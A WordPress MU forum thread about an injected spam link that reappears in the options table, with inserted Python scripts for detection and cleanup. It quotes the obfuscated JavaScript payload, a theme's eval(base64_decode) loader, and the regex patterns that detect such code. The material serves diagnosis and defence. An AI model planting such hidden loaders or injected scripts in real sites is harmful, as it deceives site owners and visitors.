The MU forums have moved to WordPress.org

my site being hacked.. please help! (32 posts)

  1. thai916
    Member
    Posted 14 years ago #

    Hi experts,

    Recently I started seeing a link to http://www.valacyclovir.co.uk/ above the header of my site. I searched all the PHP files (header, index, single etc.) but found no trace of the above link. I then searched my SQL database and there it was, under the "wp_1_options" table with the name "credit_text2". I deleted it immediately and changed all my passwords (cPanel, SQL database etc.), but later it appeared again.

    I also updated my WordPress MU to the latest version but still no go. I don't know what to do. Any expert, please advise!

    Thanks in advance,
    Tenzin

  2. SteveAtty
    Member
    Posted 14 years ago #

    You've checked all your plugins?

  3. andrea_r
    Moderator
    Posted 14 years ago #

    "I then searched my SQL database and there it was under the "wp_1_options" table with the name of "credit_text2"."

    Check the THEME. Look in functions.php.

  4. thai916
    Member
    Posted 14 years ago #

    Yes SteveAtty, I checked all the plugins (both plugins and mu-plugins) by opening each PHP file and searching for "Valaciclovir", but found no trace of it.

    andrea_r, I checked all the PHP files in the themes folder like the above mentioned but found nothing. :-(

    Isn't there a way to find out how and when someone is injecting this code, in phpMyAdmin?

    Thanks a lot for all your help.

  5. thai916
    Member
    Posted 14 years ago #

    Here's what the table (wp_1_options) looks like in phpMyAdmin:

    option_id: 738
    blog_id: 0
    option_name: credit_text2
    option_value:

    <div id="wraps">Valaciclovir</div>
    <script language="javascript">
    var wt = 'get'+'Element'
    var stl = 'st'+'yle';
    var _0xd22c=["function seeThat(elem) { eval(\x22elem.\x22+stl+\x22.display=\x27block\x27;\x22); }"];
    _0xd22c[0x0] = _0xd22c[0x0].replace(/block/i,"none");
    eval(_0xd22c[0x0]);
    </script>
    <script>
    var str = 'seeThat(document.getElementById("link"));';
    eval(str.replace(/link/i,'wraps'));
    </script>

    autoload: yes
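
The option_value above is the whole payload: the first script assembles `function seeThat(elem) { eval("elem."+stl+".display='block';"); }` from split strings, rewrites block to none before evaluating it, and the second script calls it on the "wraps" div, so the spam link is hidden with display:none once the script runs but remains in the HTML for crawlers. Because the row lives in the database, finding every blog that carries one is a query rather than a file search. The following script is an added example, not code from the thread: it seeds an in-memory SQLite database with a constructed copy of the row posted above (value abridged) and scans every per-blog options table (wp_options, wp_1_options, wp_2_options, ...) for option values containing script or iframe markup or eval chains. The 'wp_' prefix and the sample rows are assumptions.

```python
"""Scan every per-blog options table in a WordPress MU database for option
values that carry injected HTML or JavaScript, and report the row so it can
be deleted.

Added example, not code from the thread.  Seeds an in-memory SQLite database
with a constructed copy of the credit_text2 row (abridged) so it runs
offline; on a live install the same SELECTs run against MySQL through any
DB-API driver.  Assumes the default 'wp_' table prefix.
"""
import re
import sqlite3

# Markup that has no business inside an option value: script/iframe tags,
# eval() chains and DOM lookups of the kind in the dump above.
INJECTION_RE = re.compile(
    r"<script\b|<iframe\b|\beval\s*\(|document\.getElementById|javascript:",
    re.IGNORECASE,
)
OPTIONS_TABLE_RE = re.compile(r"wp_(\d+_)?options")  # wp_options, wp_1_options, ...

# Constructed copy of the injected value from the phpMyAdmin dump (abridged).
INJECTED_VALUE = (
    '<div id="wraps">Valaciclovir</div>\n'
    '<script language="javascript">\n'
    "var stl = 'st'+'yle';\n"
    'var _0xd22c=["function seeThat(elem) { eval(\\x22elem.\\x22+stl+\\x22.display=\\x27block\\x27;\\x22); }"];\n'
    '_0xd22c[0x0] = _0xd22c[0x0].replace(/block/i,"none");\n'
    'eval(_0xd22c[0x0]);\n'
    '</script>'
)


def options_tables(conn):
    """All options tables in the database, sorted (blog 1, blog 2, ...).
    SQLite lists tables in sqlite_master; on MySQL use
    SHOW TABLES LIKE 'wp%options' and filter with the same regex."""
    names = [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type='table'")]
    return sorted(n for n in names if OPTIONS_TABLE_RE.fullmatch(n))


def find_injected_options(conn):
    """Return (table, option_id, option_name, autoload, snippet) for every
    option value that matches INJECTION_RE."""
    hits = []
    for table in options_tables(conn):
        # Table names come from the catalogue and were regex-checked above, so
        # interpolating them is safe; option values are never interpolated.
        rows = conn.execute(
            f"SELECT option_id, option_name, option_value, autoload FROM {table}"
        )
        for option_id, name, value, autoload in rows:
            m = INJECTION_RE.search(value or "")
            if m:
                snippet = value[max(0, m.start() - 20): m.end() + 40].replace("\n", " ")
                hits.append((table, option_id, name, autoload, snippet))
    return hits


def build_sample_db():
    """Constructed database: blog 1 carries the injected row, blog 2 is clean."""
    conn = sqlite3.connect(":memory:")
    rows = {
        "wp_1_options": [
            (1, 0, "siteurl", "http://example.invalid", "yes"),
            (2, 0, "blogdescription", "Just another WordPress MU site", "yes"),
            (738, 0, "credit_text2", INJECTED_VALUE, "yes"),
        ],
        "wp_2_options": [
            (1, 0, "siteurl", "http://example.invalid/blog2", "yes"),
        ],
    }
    for table, data in rows.items():
        conn.execute(
            f"CREATE TABLE {table} (option_id INTEGER PRIMARY KEY, blog_id INTEGER, "
            "option_name TEXT, option_value TEXT, autoload TEXT)"
        )
        conn.executemany(f"INSERT INTO {table} VALUES (?, ?, ?, ?, ?)", data)
    return conn


if __name__ == "__main__":
    for table, oid, name, autoload, snippet in find_injected_options(build_sample_db()):
        print(f"{table} option_id={oid} {name} (autoload={autoload}): {snippet}")
        print(f"  cleanup: DELETE FROM {table} WHERE option_id = {oid};")
```

Deleting the row is only half the job, as the rest of the thread shows: whatever PHP wrote it will write it again on the next page load, so run the scan again after a cleanup to confirm the row stays gone.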

  6. dsader
    Member
    Posted 14 years ago #

    It might be encoded in base64; look for something like base64_decode($blah) where $blah is a bunch of gibberish.

    Example:

    <?php
    $str = 'VGhpcyBpcyBhbiBlbmNvZGVkIHN0cmluZw==';
    echo base64_decode($str); // prints: This is an encoded string
    ?>

    I've commonly seen coded credits in "free themes": footer, index, sidebar, header, or functions. I don't think themes from the official WordPress site can have coded gibberish in them.

  7. SteveAtty
    Member
    Posted 14 years ago #

    So what you need to look for is something that is outputting the option named credit_text2,

    so something like:

    echo get_option( "credit_text2" );

    But they might be passing it through an intermediate variable.
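
The two searches suggested in posts 6 and 7 (base64 gibberish fed to base64_decode, and code that reads credit_text2, possibly via a variable) can be done in one pass. The script below is an added example, not code from the thread: it walks a directory of PHP, flags calls that run decoded strings, decodes any long base64 literal it finds and reports whether the decoded PHP touches the options table, and lists get_option/update_option calls with their argument so an intermediate variable is visible. The theme it scans is constructed in a temporary directory (file names and payload are assumptions); point scan_tree() at wp-content/themes or wp-content/plugins on a real install.

```python
"""Find the PHP that writes or reads an injected option: calls that run
decoded strings (eval/base64_decode/gzinflate...), base64 literals that
decode to PHP touching the options table, and get_option()/update_option()
calls, including ones whose argument is a variable.

Added example, not code from the thread.  make_sample_theme() builds a
constructed theme in a temporary directory so the scan runs offline.
"""
import base64
import os
import re
import tempfile

# Execution of dynamic code and the decoders that usually feed it.
OBFUSCATION_RE = re.compile(
    r"\b(eval|assert|create_function|base64_decode|gzinflate|gzuncompress"
    r"|gzdecode|str_rot13)\s*\(",
    re.IGNORECASE,
)
# Base64 literals long enough to be worth decoding (short ones are noise).
B64_RE = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")
# Option access; the argument may be a quoted name or a variable ($name).
OPTION_RE = re.compile(r"\b(get_option|update_option|add_option)\s*\(\s*(\$\w+|['\"][^'\"]*['\"])")


def decode_b64_literals(src):
    """Yield (literal, decoded_text) for literals that decode to readable text."""
    for m in B64_RE.finditer(src):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in text):
            yield m.group(1), text


def scan_file(path):
    """Return a list of findings for one PHP file (empty if it looks clean)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    findings = []
    for m in OBFUSCATION_RE.finditer(src):
        line = src.count("\n", 0, m.start()) + 1
        findings.append({"kind": "obfuscation", "line": line, "call": m.group(1)})
    for m in OPTION_RE.finditer(src):
        line = src.count("\n", 0, m.start()) + 1
        findings.append({"kind": "option", "line": line, "func": m.group(1), "arg": m.group(2)})
    for literal, text in decode_b64_literals(src):
        findings.append({
            "kind": "decoded",
            "touches_options": bool(OPTION_RE.search(text) or "$wpdb" in text),
            "preview": text[:80],
        })
    return findings


def scan_tree(root):
    """Map relative path -> findings for every .php file under root."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                findings = scan_file(path)
                if findings:
                    report[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return report


# Constructed payload of the kind a "licence" file hides: it re-creates the
# option on every page load, which is why deleting the row never sticks.
HIDDEN_PHP = (
    "update_option('credit_text2', '<div id=\"wraps\">"
    "<a href=\"http://example.invalid/\">credit</a></div>');"
)


def make_sample_theme():
    """Constructed theme modelled on the thread: the header evals a base64 blob
    defined in theme_licence.php, the footer prints the option through an
    intermediate variable, style.css is clean."""
    root = tempfile.mkdtemp(prefix="theme-")
    blob = base64.b64encode(HIDDEN_PHP.encode()).decode()
    files = {
        "header.php": '<?php require_once("theme_licence.php"); eval(base64_decode($f1)); ?>\n<head></head>',
        "theme_licence.php": f"<?php $f1 = '{blob}'; ?>",
        "footer.php": "<?php $credit = get_option('credit_text2'); echo $credit; ?>",
        "style.css": "/* Theme Name: Sample */",
    }
    for name, body in files.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, findings in sorted(scan_tree(make_sample_theme()).items()):
        print(path)
        for finding in findings:
            print("   ", finding)
```

A "decoded" finding with touches_options set is the file to remove: it is the writer of the row, while the "option" findings are only the readers that display it.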

  8. andrea_r
    Moderator
    Posted 14 years ago #

    What's the theme and where did you get it from?

    Like dsader said, this is commonly used in themes to add credits you can't remove.

  9. thai916
    Member
    Posted 14 years ago #

    I finally got rid of it. It seems someone was stealing my FTP p/w every time I used FTP. I removed the injected iframe from SQL and changed all the p/w again (cPanel, SQL, FTP); this time I didn't use FTP for a few days and VOILA!! Problem solved!!
    I think this article explains my problem => http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml
    I hope my post will help someone facing the same problem.
    Thanks everyone for your help. Andrea, Steve, dsader, everyone..

  10. SteveAtty
    Member
    Posted 14 years ago #

    So how were they stealing your FTP password?

  11. thai916
    Member
    Posted 14 years ago #

    I have no idea how they were stealing my FTP p/w, but when I stopped using my FTP software, the problem stopped.
    For everyone's information, I was using CuteFTP version 8.

  12. pjbmarketing
    Member
    Posted 14 years ago #

    I was hacked and I'm using SmartFTP; the link is for Kamagra. I haven't had any luck locating the culprit.

  13. thai916
    Member
    Posted 14 years ago #

    One precaution one can take is not to save account details in whatever FTP software one uses.
    So NEVER STORE YOUR SITE'S FTP USERNAME AND PASSWORD IN YOUR FTP SOFTWARE.

  14. thai916
    Member
    Posted 14 years ago #

    Oh God!! The problem started appearing again. I didn't use any FTP program till now, but now (after many days) the problem has started again; this time the iframe being injected links to http://www.vardenafil2.com.
    I'm going nuts..

  15. SteveAtty
    Member
    Posted 14 years ago #

    You need to talk to your hosting company.

  16. thai916
    Member
    Posted 14 years ago #

    Thank you Steve, I knew there was something wrong with the hosting server. They deny having problems with the server, but I feel their server is compromised.

  17. SteveAtty
    Member
    Posted 14 years ago #

    Well, it sounds like it: if you've reset passwords and someone is still getting in and changing files, then there is something wrong somewhere.

    I assume you've screwed down the security so that all the files on the server that don't need to be written to by the webserver user are read-only?

    It might also be worth making a note of the timestamps of any changed files, which you might be able to use to help track down what is going on.
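
The timestamp advice in the post above works best as a baseline taken while the site is clean and compared after the next reinfection, and it should compare content hashes as well as mtimes, because an mtime can be put back after a file is edited. The script below is an added example, not code from the thread: it records a SHA-256 and mtime for every file under a web root, saves that as JSON, and classifies each path on the next run as added, removed, modified (content differs) or touched (same content, different mtime). The web root it checks is constructed in a temporary directory with a simulated reinfection (paths and contents are assumptions); on a real server point build_manifest() at the document root and keep the JSON where the web server user cannot write.

```python
"""Baseline-and-compare check for a web root: hash every file once the site
is clean, rerun after the next reinfection, and see exactly which files were
added or changed.  Content hashes are compared first, so a file whose mtime
was reset to hide the edit is still reported as modified.

Added example, not code from the thread.  demo() builds a constructed web
root and simulates a reinfection so it runs offline.
"""
import hashlib
import json
import os
import tempfile


def build_manifest(root):
    """Map relative path -> {sha256, size, mtime_ns} for every file under root."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    digest.update(chunk)
            st = os.stat(path)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            manifest[rel] = {"sha256": digest.hexdigest(), "size": st.st_size, "mtime_ns": st.st_mtime_ns}
    return manifest


def save_manifest(manifest, path):
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def diff_manifests(old, new):
    """Classify every path: added, removed, modified (content differs) or
    touched (same content, different mtime, e.g. re-uploaded unchanged)."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    modified, touched = [], []
    for rel in sorted(set(old) & set(new)):
        if old[rel]["sha256"] != new[rel]["sha256"]:
            modified.append(rel)
        elif old[rel]["mtime_ns"] != new[rel]["mtime_ns"]:
            touched.append(rel)
    return {"added": added, "removed": removed, "modified": modified, "touched": touched}


def _write(root, rel, body):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(body)
    return path


def demo():
    """Constructed web root, baseline, then a simulated reinfection:
    header.php gets an eval() appended with its mtime put back, index.php is
    re-uploaded unchanged, and a new file is dropped into uploads/."""
    root = tempfile.mkdtemp(prefix="wwwroot-")
    header = _write(root, "wp-content/themes/sample/header.php", "<?php wp_head(); ?>\n")
    index = _write(root, "index.php", "<?php require 'wp-blog-header.php'; ?>\n")
    _write(root, "wp-content/themes/sample/functions.php", "<?php // clean ?>\n")
    baseline_path = os.path.join(tempfile.mkdtemp(prefix="baseline-"), "manifest.json")
    save_manifest(build_manifest(root), baseline_path)

    st = os.stat(header)
    with open(header, "a", encoding="utf-8") as fh:
        fh.write('<?php require_once("theme_licence.php"); eval(base64_decode($f1)); ?>\n')
    os.utime(header, ns=(st.st_atime_ns, st.st_mtime_ns))  # put the mtime back to hide the edit
    ist = os.stat(index)
    os.utime(index, ns=(ist.st_atime_ns, ist.st_mtime_ns - 3600 * 10**9))  # mtime changed, content not
    _write(root, "wp-content/uploads/dropped.php", "<?php // constructed dropped file ?>\n")

    return diff_manifests(load_manifest(baseline_path), build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Files appearing under "added" in wp-content/uploads, or under "modified" with an unchanged mtime, are the ones to look at first; an mtime alone, as the post notes, is only a hint.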

  18. parkstreet
    Member
    Posted 14 years ago #

    Once you fix your problem again, you can use this to find out about login attempts; it works for all login attempts and not just WordPress. This will help you pinpoint exactly where they are coming through, if in fact they are coming through any PHP script on your account. Then, after that, I would change the permissions of my root files to 444, just in case they try to hack through those files. After you do this, if you are hacked again, then the issue is definitely with your hosting company.

  19. kgraeme
    Member
    Posted 14 years ago #

    Sounds like Gumblar.

    Description:

    Gumblar is the name of a growing botnet that compromises traditionally non-malicious Web servers in order to exploit Personal Computers (PCs) that visit those Web sites. Malware that redirects Google searches is planted on the target PC, which provides the attackers with "pay-per-click" or possibly other types of income. The malware also looks for FTP credentials on the PC and may use them to compromise additional Web sites.

    Compromised Web sites do not appear to host malware or exploits, but instead host links and redirects to malicious servers elsewhere. One of the original servers used the domain gumblar.cn, which changed to martuz.cn and will likely change, again.

  20. kgraeme
    Member
    Posted 14 years ago #

    By the way, if they're getting your FTP credentials then it's probably your personal computer that is infected. The infection is modifying your web files, which you then upload to your own host (which is how Gumblar spreads).

    As for not saving your FTP credentials in your FTP software, it won't make a difference. Every time you make an FTP connection, you are sending your username and password in clear text over the internet. Basic FTP does not encrypt the username/password in any way. So the easiest way to harvest your information is to simply have a little resident virus that monitors port 21. FTP runs on port 21, so they just watch for anything connecting on that and grab your info.

  21. miika_p
    Member
    Posted 14 years ago #

    Hi, I have exactly the same problem. There is this weird credit_text2 table in my database. After removing it the front page is OK. Last time I removed credit_text2 and after that changed my passwords, but now the weird link has appeared again on my front page. I have not used any FTP software, only Parallels Plesk.

    What should I do next?

  22. andrea_r
    Moderator
    Posted 14 years ago #

    Credit text sounds like a theme reinserting footer links. Check to see if some of your themes have base64-encoded code in footer.php.

    That's not a hack; it's common for some theme sites to do this with their themes, or with ones they re-release that are supposed to be good.

  23. miika_p
    Member
    Posted 14 years ago #

    OK, thanks. I'll check that later. The site had been working for some months before the link appeared.

    This is my site: http://rockynkuulumiset.net/

  24. miika_p
    Member
    Posted 14 years ago #

    Hi, this is my theme's messy header code...

    <head>
    <meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
    <title><?php bloginfo('name'); ?> <?php require_once("theme_licence.php"); eval(base64_decode($f1)); if ( is_single() ) { ?> » Blog Archive <?php } ?> <?php wp_title(); ?></title>
    <meta name="generator" content="WordPress <?php bloginfo('version'); ?>" /> <!--leave this for stats -->
    <link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" />
    <link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> RSS Feed" href="<?php bloginfo('rss2_url'); ?>" />
    <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
    <script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/tabber.js"></script>

    <?php wp_head(); ?>

    </head>

    theme_licence.php includes some encoded content; could that contain the weird link code?

  25. SteveAtty
    Member
    Posted 14 years ago #

    It most certainly will.

  26. miika_p
    Member
    Posted 14 years ago #

    Can I get rid of that somehow?

  27. SteveAtty
    Member
    Posted 14 years ago #

    Sure, just edit the header and remove:

    require_once("theme_licence.php"); eval(base64_decode($f1));

  28. miika_p
    Member
    Posted 14 years ago #

    Hi, I removed that code and also the one I found in sidebar.php. Still I can't get rid of that link. When I remove the credit_text2 and credit_date2 tables from my database they appear immediately back. theme_licence.php seems to be used somewhere else also, because if I remove that whole file the site will not work anymore. Is theme_licence.php required by WordPress?

  29. miika_p
    Member
    Posted 14 years ago #

    Problem solved for now. I also found a base64-coded start_template.php file which was read by header.php. By removing that line the link was removed. Hopefully that fixed it permanently.

  30. misteryCo
    Member
    Posted 14 years ago #

    Hello, I have the same problem as "miika_p" and "thai916", but I installed the "antivirus" plugin and understood very easily that my theme "VivoVista" is infected, and after a few experiments understood that the original theme I downloaded is really infected.
    The "antivirus" plugin says that the infected files are:

    functions.php
    start_template.php
    sidebar.php
    theme_licence.php
    header.php

    My question is: is it possible to solve the problem in the same way as "miika_p", just by removing
    require_once("theme_licence.php"); eval(base64_decode($f1));

    In addition I want to say that when I visited miika_p's blog I saw that he downloaded the theme from the same place I did: http://www.wpblogskins.com/
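
What caught miika_p out in posts 28 and 29, and what the file list in the post above makes explicit, is that the payload holder (theme_licence.php) is pulled in from more than one template, and start_template.php is a second loader; removing one require line leaves the others active. Tracing the include graph before removing anything shows every loader at once. The script below is an added example, not code from the thread or the antivirus plugin: it follows include/require statements with literal file names from the theme's template files, records who includes what, and flags files that eval decoded strings or hold a long base64 literal. The theme it traces is constructed in a temporary directory from the file names listed above (contents and include edges are assumptions), and includes are resolved relative to the theme directory, which is also an assumption.

```python
"""Trace include/require chains from a theme's template files so that every
file the theme actually loads is listed together with the files that load it,
and flag the ones that run decoded code or hold a base64 blob.

Added example, not code from the thread.  make_sample_theme() builds a
constructed theme so it runs offline; on a real install call trace_theme()
on wp-content/themes/<theme>.  Include paths are resolved relative to the
theme directory (assumption; real themes may build paths in other ways).
"""
import os
import re
import tempfile

# include/require with a literal filename, optionally prefixed by the usual
# theme-path expressions.
INCLUDE_RE = re.compile(
    r"\b(include_once|require_once|include|require)\s*\(?\s*"
    r"(?:dirname\(__FILE__\)\s*\.\s*|TEMPLATEPATH\s*\.\s*|get_template_directory\(\)\s*\.\s*)?"
    r"['\"]/?([^'\"]+\.php)['\"]"
)
# Dynamic code execution, decoders, or a long base64 literal (payload holder).
SUSPICIOUS_RE = re.compile(
    r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(|['\"][A-Za-z0-9+/]{40,}={0,2}['\"]"
)
ENTRY_POINTS = ("functions.php", "header.php", "index.php", "sidebar.php", "footer.php")


def inspect_file(path):
    """Return (included files, suspicious flag) for one PHP file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return [m.group(2) for m in INCLUDE_RE.finditer(src)], bool(SUSPICIOUS_RE.search(src))


def trace_theme(theme_dir, entry_points=ENTRY_POINTS):
    """Breadth-first walk of the include graph.  Returns
    {file: {"included_by": [...], "suspicious": bool}}; an included file that
    does not exist in the theme is recorded with "missing": True."""
    graph = {}
    queue = []
    for entry in entry_points:
        if os.path.exists(os.path.join(theme_dir, entry)):
            graph[entry] = {"included_by": [], "suspicious": False}
            queue.append(entry)
    seen = set()
    while queue:
        rel = queue.pop(0)
        if rel in seen:
            continue
        seen.add(rel)
        includes, suspicious = inspect_file(os.path.join(theme_dir, rel))
        graph[rel]["suspicious"] = suspicious
        for inc in includes:
            target = os.path.normpath(inc).replace(os.sep, "/")
            node = graph.setdefault(target, {"included_by": [], "suspicious": False})
            if rel not in node["included_by"]:
                node["included_by"].append(rel)
            if os.path.exists(os.path.join(theme_dir, target)):
                queue.append(target)
            else:
                node["missing"] = True
    return graph


def removal_checklist(graph):
    """Suspicious files mapped to every file that includes them: each entry
    is a require line to remove, and each key a file to delete or replace."""
    return {f: list(node["included_by"]) for f, node in graph.items() if node["suspicious"]}


# Constructed stand-in for the encoded payload (base64 of a plain ASCII run).
BLOB = "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5"


def make_sample_theme():
    """Constructed theme using the file names from the post above."""
    root = tempfile.mkdtemp(prefix="vivo-")
    files = {
        "index.php": "<?php get_header(); get_sidebar(); get_footer(); ?>",
        "header.php": '<?php require_once("theme_licence.php"); eval(base64_decode($f1)); ?>\n'
                      '<?php require_once("start_template.php"); ?>\n<head></head>',
        "sidebar.php": '<?php require_once("theme_licence.php"); eval(base64_decode($f1)); ?>',
        "functions.php": "<?php require_once(dirname(__FILE__) . '/start_template.php'); ?>",
        "start_template.php": "<?php eval(base64_decode($f2)); ?>",
        "theme_licence.php": f"<?php $f1 = '{BLOB}'; $f2 = '{BLOB}'; ?>",
        "footer.php": "<?php wp_footer(); ?>",
    }
    for name, body in files.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    graph = trace_theme(make_sample_theme())
    for name, node in sorted(graph.items()):
        flag = " SUSPICIOUS" if node["suspicious"] else ""
        print(f"{name}{flag}: included by {node['included_by'] or '(template entry point)'}")
    print("remove:", removal_checklist(graph))
```

The checklist is the answer to the question in the post above: removing the one line in header.php is not enough when sidebar.php and functions.php load the same files, and a theme that ships with these files is better replaced than patched.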

About this Topic

  • Started 14 years ago by thai916
  • Latest reply from misteryCo